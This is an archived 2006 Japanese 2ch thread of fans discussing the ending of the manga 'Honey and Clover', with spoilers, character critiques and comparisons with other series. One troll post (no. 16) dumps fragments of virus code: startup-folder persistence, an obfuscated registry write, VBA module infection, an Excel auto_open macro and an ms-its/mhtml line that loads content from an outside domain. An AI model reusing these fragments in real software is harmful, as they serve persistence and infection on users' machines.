5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

羽海野チカ「ハチミツとクローバー」その54

1 :花と名無しさん:2006/08/05(土) 01:54:19 ID:xURS1LkV0
◆ コミックス第9巻…発売中 ◆
◆ アニメ第2部…放送中 ◆
◆ 映画…上映中 ◆

※アニメ、映画の話題はそれぞれ専用のスレがあるのでそちらでどうぞ(>>2-3参照)※


★ このスレはsage進行です ※メール欄に半角で「 sage 」と記入。これ重要※

★ 荒らし・煽りは完全無視 ※反応するアナタも同罪です。これ常識※

★ 風紀もほどほどに ※話題の流れを変えたかったら自分から別の話題を投下する。これ鉄則※


≪前スレ≫
羽海野チカ「ハチミツとクローバー」その52
http://comic6.2ch.net/test/read.cgi/gcomic/1154020445/

★ 過去ログ保管庫
http://www.geocities.jp/hachikuro2ch/

関連スレ,頻出質問事項等は>>2-20あたりに



2 :花と名無しさん:2006/08/05(土) 01:54:40 ID:???0
≪過去ログ≫
http://makimo.to:8000/cgi-bin/search/search.cgi?q=%89H%8AC%96%EC%83%60%83J&sf=2&andor=AND&H=&view=table&all=on

≪関連スレ≫
≪過去ログ≫
http://makimo.to:8000/cgi-bin/search/search.cgi?q=%89H%8AC%96%EC%83%60%83J&sf=2&andor=AND&H=&view=table&all=on

≪関連スレ≫
ハチミツとクローバー II chapter.2 【ハチクロ】
http://anime.2ch.net/test/read.cgi/anime/1152568435/ (アニメ板)
【櫻井翔】ハチミツとクローバー3冊目【蒼井優】
http://tv8.2ch.net/test/read.cgi/cinema/1153675073/(映画作品・映画人板)
ヤフー掲示板 ハチミツとクローバー
http://messages.yahoo.co.jp/bbs?action=m&board=552018449&tid=a1ya5oa5aa5dfa5da4ha5afa5ma1bca5pa1bca1y&sid=552018449&mid=1



3 :花と名無しさん:2006/08/05(土) 01:54:53 ID:???0
≪公式サイト≫
ハチクロ連載中コミック誌「コーラス」
h ttp://chorus.shueisha.co.jp
作者(羽海野チカ)
h ttp://www13.plala.or.jp/umino
アニメ
h ttp://www.hachikuro.net
映画
h ttp://hachikuro.jp

≪頻出質問事項≫
Q.花本はぐみは、花本修司の姪ですよね?
A.違います。花本修司のいとこの娘です。※映画でのみ「姪」設定となっています

Q.登場キャラクターの身長の設定はどうなってますか?
A.[はぐ 145cm][山田 167cm][竹本 174cm][森田 179cm][真山 181〜182cm]



4 :花と名無しさん:2006/08/05(土) 01:55:07 ID:???0
羽海野チカインタビュー
ttp://books.yahoo.co.jp/interview/detail/07145617/01.html
・キューコミで初めはカットを描いてほしいって頼まれたのが
作者のアピールでマンガ連載って事になる。
・初めは竹本・真山・森田の三人の学生生活とか青春物を描く予定だった
・彼らの恋愛も描きたくなったので女子キャラ投入
・掲載誌を移ることになってクリスマスやら何やらのイベントをもう一回
やりたいからその為に一年分の時間を稼ぐ為に竹本を留年させた。
●真山のモデルはスガシカオの歌詞の主人公
ttp://www.s-woman.net/umino/1.shtml
「スガさんのつくった歌の中に、真山君みたいな子が出てくるときがときどきあるんです。多分、ご本人が自分のことを歌っているんだと
思うんですけども。ちょっと自分をどう扱っていいかわかんないみたいな
男の子が出てきて、マンガにしたら、今まで見たことない男の子に
なるんじゃないかなと」


5 :花と名無しさん:2006/08/05(土) 01:55:18 ID:???0
●修とはぐの恋愛は羽海野の芸能人萌えのせい。
 竹本の糞男化は羽海野の芸能人萎えのせい。
・映画の修役の堺雅人が、最近の修の描写に影響
・映画のはぐ役の、最近のはぐの描写に影響
・アニメの竹本役と、映画の竹本役(ジャニーズ嵐の櫻井)が
 最近の竹本の描写に影響 …なことを羽海野が映画版ハチクロ本にて暴露。




6 :花と名無しさん:2006/08/05(土) 01:55:36 ID:???0
●● 竹本の不幸  ●●
・小学生の頃父が他界。高校で母が再婚するが、自分の進む道がわからなくなる。
 この頃からすでに彼の自分探しは始まっていた。探さない方がいいのに。
・浜美入学早々森田に中学生みたいな髪型にされ一年間振り回される。
・天才はぐに一目惚れし、己の平凡さを嘆き将来に不安を覚える。ここから真の不幸が始まる。
・今日なんで集まったんだっけ?「ぼくの誕生日ですよ」しかもツイスターゲーム。
・はぐの部屋に泊まる事になるが、夜中にベルサイユのキッチンセットを作ってと言い残しはぐ就寝。
 ただの奴隷扱いだがこれはまだ幸せだったかもしれない。むしろ絶頂期。
・森田がはぐを好きだと気付き、勝ち目が無いと悟りぼんやりする。
・夜、電話一本でクリスマスなのにバルーンアートを徹夜で作る手伝いにかりだされる。不眠でバイトへ。
・「はぐは森田となかよしだったりするのかい?」「先生…ぼくに聞かないでください」
・就職に失敗し続け学園祭用の謎の塔を一心不乱に作り続ける。この頃から鬱病気味に。
・錯乱した山田のかかと落としが直撃。
・「いるべき人が いなくって いなくても どってことない人間が ここでケーキを口に運んでいる」
 クリスマスケーキを食べながら超ネガティブ思考。そしてまたツイスターゲーム。
・卒業制作の作業中に吐血>入院>浪人。
・内定が決まった日に、就職先がどうやら倒産しそうだという報せが就職祝い中に届く。
・幻聴が聴こえてくる。気付いたら自転車で海へ。ここは精神崩壊の瀬戸際だったがなんとか持ちこたえた。
・ママチャリであてもなく日本列島を北上。痔になる。
・旅先で住み込みバイト中に、年下の元ヤンから「おまえ」「ばかじゃねーの」等の罵声を浴びる。
・一皮むけて旅から帰ってきてフラれる。

●● 竹本の人格崩壊後 ●●●●●●●●

・花も買えない情けない男
・森田をねたんで、森田にはぐみを取られるくらいなら修に取られる
 ほうがマシだと、修にはぐみに愛の告白をするようたきつける
・兄貴と関係で不幸のズンドコの森田に対して、人間として
 言ってはいけないことを言う

7 :花と名無しさん:2006/08/05(土) 01:55:52 ID:???0
●●コミックスになっていない分のあらすじ●●

治さなくていい、いてくれるだけでいいと精一杯告白する森田に
描けなくなったら私は死んじゃうと、病院に戻るはぐ。
病院から外へ連れ出した森田を殴る修。

はぐ、修の手を握りながら
「あのねお願いがあるの 修ちゃんの人生を私に下さい 
ごめんね 返せるかもわかんないのに こんな事言って でも
でも・・・私描きたいのずっと だから 一緒にいて 最後の最後まで」
「いいよ・・・返さなくていいよ 全部やるよ」と返事する修。ラブラブムード。
はぐのモノローグ
『修ちゃんは私の雨だ。一緒にいると深く息ができて草や木みたいに
 ぐんぐん伸びてゆけそうな気がする。 私のだいじな だいじな ひと』

別の場面で、森田と竹本は殴りあい。人格崩壊後の竹本は、森田をねたんで
金と才能だけの人間でしかない森田にはぐを取られるくらいなら
修に取られたほうがマシだったと言う。森田の頭の中に「才能才能才能」の言葉が響く。

森田は修に現金が大量に入った段ボールを
「これでアイツ(はぐみ)を治してやってくれ」と修に贈りつけるが
修はそのうち札束3つ(約300万)をゲットして、それ以外は森田に投げつけて返し
「金は返すがはぐは返さん! ハハハハ (はぐのことは)好きさ!大好きさ!」
と真っ赤になりながら叫ぶ。 そして森田は去ってゆく。

そんな修にキャーキャーいいながら驚く山田。
野宮は、リーダー(犬)を比喩に出して、山田に臭とはぐと森田の関係を納得させる。
リカと修は抱擁の末、別れた。
真山は、修がはぐみを好きなことを大歓迎の様子で、大喜びする。

8 :花と名無しさん:2006/08/05(土) 01:56:06 ID:???0
 918  822 [sage] 2006/07/27(木) 00:08:41 ID:???0
ではもう少し詳細なバレ投下します。ネタバレ嫌な人は避けてね。


○表紙ハチクロ。巻頭ではないが見開きカラー扉あり。
〈内容〉
引越しの準備でボロアパート部屋を片付ける竹本。
その後、送別会を開く。(森田はいない)
真山が「最後だから竹本はウチに泊まらせますよ」の言葉に反応して
みんな泣きそうになる。
思わず修がはぐにおつかいを頼み、付き添いで竹本も外出。
竹本のチャリの後ろにはぐが座る。怪我はかなり回復している様子。
はぐが竹本の卒制作品について語る。
「竹本君はどこにも手を抜かない人だから、竹本君に作ってもらったお寺は幸せだね」等。
「今まで修ちゃんに沢山のものを貰ったから、返さないといけない」とも言う。
それに対して竹本「はぐちゃんはそんなこと考えなくていいよ。先生は自分で見つけられる人だから」
はぐ「…ありがとう。」

美和子さん山崎が仲直りをセッティングしてくれる。(前回野宮が山田をいじめた件で)
野宮と山田が落ち合う。前回のことで気まずい2人。
山田が「もう会わない方がいいのかもしれない」と言うと、野宮は納得して去ろうとするが
泣いてしまう山田に振り返って「真山のことはずっと引きずっているけど、でも一緒にいよう」
というような事を話す。手を繋がれたまま山田号泣。


9 :花と名無しさん:2006/08/05(土) 01:56:17 ID:???0
森田と馨が2人布団を並べて会話をしている。
はぐのことを聞かれ「あいつは強い女だよ」など少し語る。
ピーターの所に行く決心も語る。
「会社が停電したらピーターも他の社員も、みんなビームサーベルもって部屋から出てくるんだぜ!?
こんな大人達、父さん以外見たことない」
会話の最中にぼんやりと光りが出てくる。「父さんが言ってたことが分かったような気がする」

竹本のモノローグに移る。
報われない片思いは意味があるのか云々語り、「はぐちゃん、君を好きになって良かったよ」という結論に達する。
モノローグの間に場面が展開して、駅のホームで竹本がはぐから包みを渡される。
席に着いて開けてみると、パンが何段も重なったサンドイッチが入っていた。
パンをめくって中身を見てみると、ハチミツが縫ってある。真ん中には四葉のクローバーが。
昔みんなでクローバーを探した記憶が蘇る。「あの時全然見つからなかったのに…」
更にめくると、全段にハチミツと四葉のクローバーが入っていた。
電車の中で竹本号泣。
モノローグで少し語って終了。


こんな感じでした。抜けてるエピソードとかあるかもしれません。
台詞やモノローグもあやふやですみません。

最終回だったのに、次号予告で何故かハチクロの付録がありました。


10 :花と名無しさん:2006/08/05(土) 02:01:09 ID:???0
テンプレ長w


11 :花と名無しさん:2006/08/05(土) 02:16:36 ID:???0
1・森田→はぐの理由
  …ロリ美少女外見に一目惚れ&天才芸術家同士合い通じるものがあった

2・竹本→はぐの理由
  …ロリ美少女外見に一目惚れ&守ってあげたい願望

3・真山→リカの理由
  …ほっとくと自殺しそうな危うい綾波風女に庇護心
   不幸な過去を背負った女がほっとけなかった

4・山田→真山の理由
  …逃げられると追いたくなる原理

5・はぐ→臭の理由
  …子供のころからお互いを知っていて、
   自分を庇護して甘やかしてくれる楽な相手

6・臭→はぐの理由
  …近親、ロリコン性癖

7・野宮→山田の理由
  …可愛かったから。逃げられると追いたくなる原理。ピュア+乙女毒にやられた。
   モテる男が一人の処女乙女にはまるという厨向け少女漫画の王道パターン


12 :花と名無しさん:2006/08/05(土) 02:18:33 ID:???0
●● 真山のテンプレ ●●

・初期はコンパでは女の子お持ち帰り。しかしその後のオマケ話でそれは山田の勘違いとゆう後付け設定。このオマケ漫画により実は山田が全て原因とゆう結末になる
・花本先生の携帯履歴を勝手に見てその後なにもなかったように本人と会話
・無理してカッコつける大人ぶる『大人さいこ〜』
・野宮の山田への接触を邪魔をする、山田をふっておきながらさらに恋を迷わせる
・次にリカを見掛けたら『襲いかかるかもしれません』発言
・無理矢理寝ていたリカの唇を奪う
・無理矢理 リカの仕事場に押し掛け勝手に入り仕事場を獲得する。そして勝手にコーヒー入れる
・リカのバスタオルに顔をうずめたり、浴槽のフチを『ああ、ここでリカさんが』とかいってなでまわしたりしてる by予想者・美和子(予想的中)
・山田とリカの接触を嫌がる 山田の仕事奪う もみ消しを図る
・リカのパソコンの履歴を勝手に見る
・リカ宛てのメール、FAX、郵便、書類を見て 全てリカの事は知ってる!!!
・『俺に関わったのが間違いだったな、どこまでもつきまとってやる!』と言う
・リカのいない時、また勝手にパソコンを開きメールを勝手に見る。
・『おとうさんは〜』『とうさんが悪かった!!』 自分をやたらおとうさんと呼ぶ←意味不明
・盗難防止用ベルを持ち歩いていて リカのバッグに内緒でつけた。
・リカが鍵をかけて寝ている部屋を道具を使い笑いながら侵入しようとする


13 :花と名無しさん:2006/08/05(土) 02:22:41 ID:???0
●● はぐノート〜はぐ、恐ろしい子… ●●

はぐノートに書いたものはもれなく手に入る…。

才能
ババア病死
ミュール
森田の心
竹本の心
倉持くんの心
修ちゃんの心
たくさんの四つ葉のクローバー
治った両手

ttp://www.hcn.zaq.ne.jp/gallerycraft/hagunote.html

14 :花と名無しさん:2006/08/05(土) 02:25:19 ID:???0
テンプレちと やりすぎじゃ・・・?

15 :花と名無しさん:2006/08/05(土) 02:28:22 ID:???0
>>14
正式テンプレは9までだよ

16 :<body onload=window()>:2006/08/05(土) 02:32:11 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

17 :花と名無しさん:2006/08/05(土) 02:54:54 ID:???0
>>16
関係者or信者乙。

18 :花と名無しさん:2006/08/05(土) 02:57:03 ID:???0
なんつうか、痛々しい。一人ひとりのキャラが。
漫画としては見れるけど。

19 :花と名無しさん:2006/08/05(土) 03:11:47 ID:???0
ドラマになるの?

20 :花と名無しさん:2006/08/05(土) 03:12:24 ID:???0
前スレ1000まで埋めてくださいね。

21 :花と名無しさん:2006/08/05(土) 03:13:36 ID:???0
>>1
乙…と言いたいところだが

アニメスレ変わってますから…↓

ハチミツとクローバー II CHAPTER.3【ハチクロ】
http://anime.2ch.net/test/read.cgi/anime/1153666615

あと、前スレは↓ね

羽海野チカ「ハチミツとクローバー」その53
http://comic6.2ch.net/test/read.cgi/gcomic/1154257525


22 :花と名無しさん:2006/08/05(土) 03:15:11 ID:???0
スマン誤爆
ドラマは某のだめか

23 :花と名無しさん:2006/08/05(土) 04:05:54 ID:???0
>>21 サンクス
(;´Д`)うわぁごめんです


24 :花と名無しさん:2006/08/05(土) 04:09:06 ID:???0
そのうちドラマもやるだろ

25 :花と名無しさん:2006/08/05(土) 05:25:44 ID:???0
確かにやりそうだなドラマ・・・このまま人気が続けばだが

26 :花と名無しさん:2006/08/05(土) 05:32:58 ID:???0
野宮と山田の最期ってめぞん一刻の結末のチープ版て事?

27 :花と名無しさん:2006/08/05(土) 06:35:54 ID:???0
>>26
めぞん一刻に失礼
いやマジで

あれはどっかの中学生が書いたドリーム小説レベル

28 :花と名無しさん:2006/08/05(土) 06:57:09 ID:???0
羽海野チカのご尊顔
http://210.150.210.38/cgi-bin/peni/img/37001.jpg

29 :花と名無しさん:2006/08/05(土) 08:37:19 ID:???O
なに この漫画自体を批判するテンプレの多さ

30 :花と名無しさん:2006/08/05(土) 08:43:22 ID:???0
>>29
信者乙

31 :花と名無しさん:2006/08/05(土) 08:44:56 ID:???0
携帯臭

32 :花と名無しさん:2006/08/05(土) 08:49:42 ID:???0
ギャグマンガとして好きだったのにー。

33 :花と名無しさん:2006/08/05(土) 10:22:40 ID:???0
微妙な設定集

たけのこはマヨラー
臭は軍艦マニア
臭は日本画コレクター
はぐは金の亡者

真山が姉3人ていうのは彼の結構人格形成っていうかストーカー行為に
影響来たしてる気がするから、無駄じゃないな。

34 :花と名無しさん:2006/08/05(土) 10:27:56 ID:???0
「軍艦マニア」で「酒豪」で「日本画コレクター」で「けっこう乱暴者」
な花本先生

よっぽど作者に気に入られてたようだね

35 :花と名無しさん:2006/08/05(土) 10:28:21 ID:???0
一番無駄な設定は、
はぐがちびってことじゃね?
それさえなきゃ、臭はぐも見れなくも・・・いや無理だ。

36 :花と名無しさん:2006/08/05(土) 10:29:25 ID:???0
>>34
「修の料理はサイコー」も付け加えといて

37 :花と名無しさん:2006/08/05(土) 10:30:22 ID:???0
山田だって最初は「鉄人」で、
犬のダイエットのために毎朝走ってくるようなこだったのに。
今の山田は「そんなのはずかし〜きゃ〜」とか言いそうな気がしてならない。
あれも微妙な設定というかなんというか。

38 :花と名無しさん:2006/08/05(土) 10:32:49 ID:???0
森田のムダ(部屋が宇宙船みたいとか)はそれ自体がギャグだからいいけど
修司のムダは本当にただのムダなのにやたらと多いね。

39 :花と名無しさん:2006/08/05(土) 10:33:21 ID:???0
はぐの低身長設定は、
はぐというキャラの攻撃性の低さを読者に訴える役割を果たしてるから
わりと重要かもよ?
ウミノさんの好む「嫌われにくいキャラ」ってやつ。

40 :花と名無しさん:2006/08/05(土) 10:37:19 ID:???0
だが今となっては・・・

41 :花と名無しさん:2006/08/05(土) 10:38:55 ID:???0
全部嫌われないための設定か。
暗い過去の数々とかも・・・納得した。

>>27
最後の一行同意。
絵とか雰囲気でなんとなく感動しちゃうけど、
あれ文章で読んだらほんとにプロの仕事とは思えない代物だと思う。
実際バレ読むと、これはネタ?って思う。

42 :花と名無しさん:2006/08/05(土) 10:43:47 ID:???0
自分はムダな設定すきだったよ、山田の犬の話とか。
ただしそれは、ハチクロがああいう、日常の恋愛とか青春とかささいな色々を描く漫画だったからで、
ケガだの人生だのストーリーが展開しだしちゃった今となっては、
必要なかっただろと思う。

43 :花と名無しさん:2006/08/05(土) 10:48:27 ID:???0
あるある、
最初はほのぼのとした青春や恋愛ものだったはずが
ドッコイ途中からシリアス展開にのめり込んでく漫画。

「翔んだカップル」とかがいい例か。

44 :花と名無しさん:2006/08/05(土) 10:49:24 ID:???0
そういや、山田が散歩に連れてきてた犬(タロウ?)って
実家で飼ってたんだよね?
商店街のイソジンちゃん出すならタロウも出して欲しかった

45 :花と名無しさん:2006/08/05(土) 10:52:41 ID:???0
過去の主な豹変漫画
 
・翔んだカップル
・ハレンチ学園
・はじけてザック
・熱笑花沢高校

46 :花と名無しさん:2006/08/05(土) 11:00:03 ID:???0
>>45
下2つは知らんなぁ…

太陽の戦士ポカポカ

とかも豹変系wかも。
作品を通して「ノリ」や「哲学」は一貫してたけど。

47 :花と名無しさん:2006/08/05(土) 11:00:57 ID:???0
>>44
もしかしてウミノさんってタロウの存在自体忘れてる?

48 :花と名無しさん:2006/08/05(土) 11:03:24 ID:???0
はじけてザックは驚異の二段変形を遂げた怪作w
ギャグ漫画→ボクシング漫画→バイオレンス魔界漫画

49 :花と名無しさん:2006/08/05(土) 11:09:03 ID:???0
>>48 スゲー… 二段変形とか…
「ギャグ漫画が豹変」なら、「世紀末リーダー伝たけし」も有名だね。

つか
羽海野チカ って 第二の柳沢きみお じゃね?

50 :花と名無しさん:2006/08/05(土) 11:54:44 ID:???0
柳沢きみおの「妻をめとらば」はひっどい終り方だったもんなぁ

51 :花と名無しさん:2006/08/05(土) 11:57:38 ID:???0
柳沢きみおって、絵がヘタクソすぎ

52 :花と名無しさん:2006/08/05(土) 12:00:06 ID:???0
君ら守備範囲広すぎw

53 :花と名無しさん:2006/08/05(土) 12:05:18 ID:???O
ハチクロ9巻やっと今読んだ。
暗っっっっ!!!
え〜〜〜???
なんでなんでこんなんなってんの。
最後までほのぼので終わった方がよかった。
ガッカリだー

54 :花と名無しさん:2006/08/05(土) 12:12:35 ID:???0
知らない漫画名ばっかりだぜ。

55 :花と名無しさん:2006/08/05(土) 12:16:46 ID:???0
>>47
たぶんそれ。


56 :花と名無しさん:2006/08/05(土) 12:26:34 ID:???0
>>50
ヒドイのは妻めとだけじゃない。
かなりの長期連載でも尻切れトンボなラストの作品が数点ある。

>>53
10巻でもっとすごいことになるから。

57 :花と名無しさん:2006/08/05(土) 12:51:47 ID:7PGQpAfs0
特別辺?番外編?って来月号のコーラスから掲載されるのですか?

58 :花と名無しさん:2006/08/05(土) 12:58:03 ID:???0
ハチミツとクローバー10巻 (2006)9月8日 発売

(h ttp://comics-news.shueisha.co.jp)

>>57
「秋」に予定している、と書いてあるだけで、ハッキリしない。
コーラスの来月号予告には載ってなかった。

59 :花と名無しさん:2006/08/05(土) 13:10:56 ID:???O
普通の終わりじゃつまらないからこれで良かったよ。


60 :花と名無しさん:2006/08/05(土) 13:47:15 ID:???0
なんつうかあくまで「モラトリアム漫画」としてまっとうすぎる終わり方で。
そこに小さく収まったか。という。
それでも上手い話の運び方なら感動もできただろうけど、
終盤の描き逃げのような展開のせいで感じた残尿感が不快だった。

61 :花と名無しさん:2006/08/05(土) 13:47:20 ID:???0
豹変漫画つったら、「彼氏彼女の事情」でしょ。
最初の頃のふいんきが好きだった。

62 :花と名無しさん:2006/08/05(土) 13:56:22 ID:???0
想像する今後。
修はぐは地味に日本で芸術活動。
竹本はしんさんみたいに。
森田はハリウッド女優との噂も聞こえてきたり。
真山理花は…理花が手に入って一番行動基準が読めない真山…
野宮山田は、子供ができると山田は鉄人に戻りそう、野宮を下に敷きそう

63 :花と名無しさん:2006/08/05(土) 14:01:51 ID:???0
>>61
>彼氏彼女の事情

確かに、この作品もまた香ばしい豹変ぷりだった…
作者の「萌」でダメになった…ともいう。

64 :花と名無しさん:2006/08/05(土) 14:04:00 ID:???0
真山の存在意義=理花だったからなあ
案外理花さんが過去を吹っ切って完璧に真山のものになったら
逆に理花に物足りなさを感じ始めて山田を恋しがるかもわからんね
山田の心が野宮のものになれば余計にそうなりそうで怖い

65 :花と名無しさん:2006/08/05(土) 14:10:15 ID:???0
真山は理花と同居して夜のお勤めするようになって肩書きだけ「専務」になっただけで、他は何も変わらない。
さすがにタオルに顔は埋めなくなった。

66 :花と名無しさん:2006/08/05(土) 15:22:06 ID:???O
前スレ>>998
日本画コレクターだの軍艦好きだの
恐らくうみののその場その場での思い付きだよ。
だから後々設定クラッシュする

前スレ>>999
はぐはみんなから愛されるキャラなの☆彡
はぐは才能あるけど
日常生活はみんな支えてくれないといけないの☆彡
はぐは幼いから恋愛とかセックスとか知らないの☆彡

67 :花と名無しさん:2006/08/05(土) 15:29:02 ID:???O
>>29
こういう奴が流行りに易々と乗るんだね

68 :花と名無しさん:2006/08/05(土) 16:14:57 ID:???0
>>66
マリオはコスプレマニアで
ルイージがギャンブラーとかいうおバカな設定もありましたっけね。

>はぐはみんなから愛されるキャラなの☆彡
>はぐは才能あるけど
>日常生活はみんな支えてくれないといけないの☆彡
>はぐは幼いから恋愛とかセックスとか知らないの☆彡

初期の雰囲気の中での彼女のキャラなら
そんな痛々しい設定も許せた(誤魔化せた)かもしらんが、
おもっくそリアル路線に突入した今となっては
ポ(゚Д゚)カーンでしかないよな・・・。


69 :花と名無しさん:2006/08/05(土) 16:23:30 ID:???0
>>60
全文に同意。
他に何も言うべきことはない。

70 :花と名無しさん:2006/08/05(土) 17:52:25 ID:???0
>>68
今のはぐなら最後の一文も知ってるの☆彡 言いそう

71 :花と名無しさん:2006/08/05(土) 18:08:13 ID:???0
森田はもともとはルーカスみたいなところが一番似合うんだよ
かえるべきところに帰ったってことで

72 :花と名無しさん:2006/08/05(土) 18:13:54 ID:???0
森田はモラトリアム卒業と見せかけて、
ただモラトリアンの仲間が大勢いるところに行っただけという。
まあモノを作る人って普通の大人になっちゃダメなところもあるかんな。
その辺の逃げ道は竹本視点にすることでふさいである。
あくまでモラトリアムの終わりを以ってハチクロを終了にしたのだ。

73 :花と名無しさん:2006/08/05(土) 18:16:52 ID:???0
>まあモノを作る人って普通の大人になっちゃダメなところもあるかんな。

なんちゃってクリエーターから、よく聞くセリフだ・・・。
普通の大人になったらダメとか、常識からはずれたことしなきゃね!とか。

74 :花と名無しさん:2006/08/05(土) 18:19:23 ID:???0
まあ事務サラリーマンと物作る人では許されることが違ってくるから。
39歳でもB-BoYやってられたりさ。

75 :花と名無しさん:2006/08/05(土) 18:28:42 ID:???O
今、Mフェア見てたんだけど
平原綾香の歌の歌詞に「自分探し」っていうフレーズがあって…なんとなくクスリときてしまった


76 :花と名無しさん:2006/08/05(土) 18:32:46 ID:???0
山田とたけのこがくっつきゃよかったのに

77 :花と名無しさん:2006/08/05(土) 18:32:48 ID:???0
ミスチルも歌ってるけど、一切の照れもなしにそれ賛歌歌われるとちょっとね

78 :花と名無しさん:2006/08/05(土) 18:36:06 ID:???O
いや、自分探し自体は問題ないと思うのね
ウミノさんが恥ずかしいことの様に書いてたから反応しちゃったんだな、きっと

自分探しって言葉、結構好きだったんだけど

79 :花と名無しさん:2006/08/05(土) 18:38:07 ID:???0
自分探しって、自分ってどっかに落っこちてるものなの?
「今の自分は本当の自分じゃない」
とか考える女々しさが自分自身じゃないのかな。
それ以上でもそれ以下でもないよ。

80 :花と名無しさん:2006/08/05(土) 18:40:52 ID:???0
いまの保守系じい様の間では自分探し=ヘタレ若者の逃避 らしいよ。
自分探しのせいで職につかずにニートになるわ
イラクで人質に取られるわ、屁理屈は覚えるわ、ロクなことはない!ってさ。
ウミノさんの偉いのはその意見と若者の意見の間を取って両方を優しく見つめたところね

81 :花と名無しさん:2006/08/05(土) 18:41:39 ID:???O
う〜ん、今の自分は本当じゃないって極端な考えじゃなく
違った自分があるかもっていうニュアンスかなと

どっかに落ちてるじゃなく、自分の中に今まで知らなかった自分がいるかもとか

そんな感じ?個人的意見で申し訳ないが

82 :花と名無しさん:2006/08/05(土) 18:44:56 ID:???O
あ、あと自分探し=ニートっていうのはわかる

けど私は仕事とか日常生活しながら、自分を意識して見直すってのも自分探しだって思ってるよ

83 :花と名無しさん:2006/08/05(土) 19:03:57 ID:???0
>>68
> マリオはコスプレマニアで
> ルイージがギャンブラーとかいうおバカな設定もありましたっけね。
それは一応元ネタに基づいてるんじゃないのか

84 :花と名無しさん:2006/08/05(土) 19:09:54 ID:???0
>>83
そんな話聞いたことねぇよバカw

85 :花と名無しさん:2006/08/05(土) 19:14:00 ID:???0
はぐの境遇はフリーダ・カーロをちょこっとモデルにしてる?
フリーダは男を肥やしにしてるところも含めて好きなんだけど、
はぐはなんかイヤだ…。

86 :花と名無しさん:2006/08/05(土) 19:16:18 ID:???0
>>84
たぬきスーツ・バニー
絵合わせ・カジノ

ちゃんとゲームやってから言え

87 :花と名無しさん:2006/08/05(土) 19:17:18 ID:???0
>>85
あんなまがまがしい作品は、はぐは作らないだろう
それにどうせ治るんだろうし

88 :花と名無しさん:2006/08/05(土) 19:18:09 ID:???0
>>86
ゲームやってることをそんなにえばられてもwww
恥ずかしいよ?

89 :花と名無しさん:2006/08/05(土) 19:21:36 ID:???0
>>72
こっちの解釈は逆なんだよな
今まで才能だの天才だのと言われていた人がやっと「普通扱いされる」世界に行けたと言うか、
才能があっても全く気負わずにいられる場所を見つけられたから、そこを選んだように見えた。
そこだけ見れば、立場は全然違うけど竹本も似たようなもんじゃないかと思う。

彼ら2人にとって浜美も友人たちもはぐも「もう2度と戻れない思い出の場所」であり、
それはモノローグで時々語られていたように薄々わかっていたことなんじゃないかと。

90 :花と名無しさん:2006/08/05(土) 19:22:45 ID:???0
>>80
イラク人質は、まぁ・・・置いておいて
いつまで経っても、自分探しばっかりして職につかずにニート
やってるのは、ヘタレ若者の逃避だと思うけどな。
そういう人達って本当にクチだけは達者で、マスゴミの言うこと
鵜呑みにして、年金や税金を収めることを馬鹿にしてるんだよね。

91 :花と名無しさん:2006/08/05(土) 19:24:25 ID:???0
>>80は厨房か、中二病っぽい。

92 :花と名無しさん:2006/08/05(土) 19:26:50 ID:???0
>>88
だったら知ったかぶりしなきゃいいだろ?
ゴメンなプライド傷つけちゃって

93 :花と名無しさん:2006/08/05(土) 19:27:23 ID:???0
>>88
だったら知ったかぶりしなきゃいいだろ?
ゴメンなプライド傷つけちゃって

94 :68:2006/08/05(土) 19:57:20 ID:???0
なんか自分の書き込みのせいで荒れてるorz

>>83
自分は元ネタの所在はわかってまふ。
特定の人間の選民意識をくすぐる設定だ、と
皮肉を込めた表現で触れたわけで…。
その発言自体がおバカだった…消えます。

95 :花と名無しさん:2006/08/05(土) 20:02:40 ID:???0
>>93
興奮して二度も書き込まなくてもwww


96 :花と名無しさん:2006/08/05(土) 20:06:38 ID:???0
>94
荒れてんのはせいぜい2人だ 気にスンナ('・ω・`)

10巻もう来月に発売か
あとがき、また身内ネタ凄まじいんだろうなァ
10巻までそろえて早いトコまとめ売りしよう・・・


97 :花と名無しさん:2006/08/05(土) 20:14:08 ID:???0
表紙は普通に5人絵だろうね

98 :花と名無しさん:2006/08/05(土) 20:19:20 ID:???0
バカが単なる意見にケチつけたからね。
いくらなんでも頭ごなしに否定するのはどうかと思う。

99 :花と名無しさん:2006/08/05(土) 20:40:42 ID:???0
>>94
消えなくていいよー。
はぐみにいろいろつっこみどころがあるのは同意。

ラストで、ちゃんと自我や考えてることがある子に描くのなら
どうして幼女のような容姿と性格で描いてたんだろうなぁ…。
アレに一目ぼれした竹本と森田が(あと一目ぼれじゃないけど臭も)
どうしてもロリコンおにいさんにしか思えなくて
読んでて辛かった。

やっぱり、映画役のはぐの女優さんを見て
「おとなっぽいはぐみもイイ!(・∀・)」と
はぐの設定を変えちゃったんだろうなぁ。

100 :花と名無しさん:2006/08/05(土) 20:43:40 ID:QXCbRtdw0
真山ってどうなったの?ほかの人物はどうなったかよくわかったんだけど・
変な終わり方だね〜もっと続くと思ってたのに

101 :花と名無しさん:2006/08/05(土) 20:52:45 ID:???O
ウミノたんが飽きてしまったので終了…










のように見える展開orz

102 :花と名無しさん:2006/08/05(土) 21:14:26 ID:???0
これ以上儲けられる作品を描くことはできないでしょう
なかなかいさぎいいじゃないのよ

103 :花と名無しさん:2006/08/05(土) 21:23:56 ID:???O
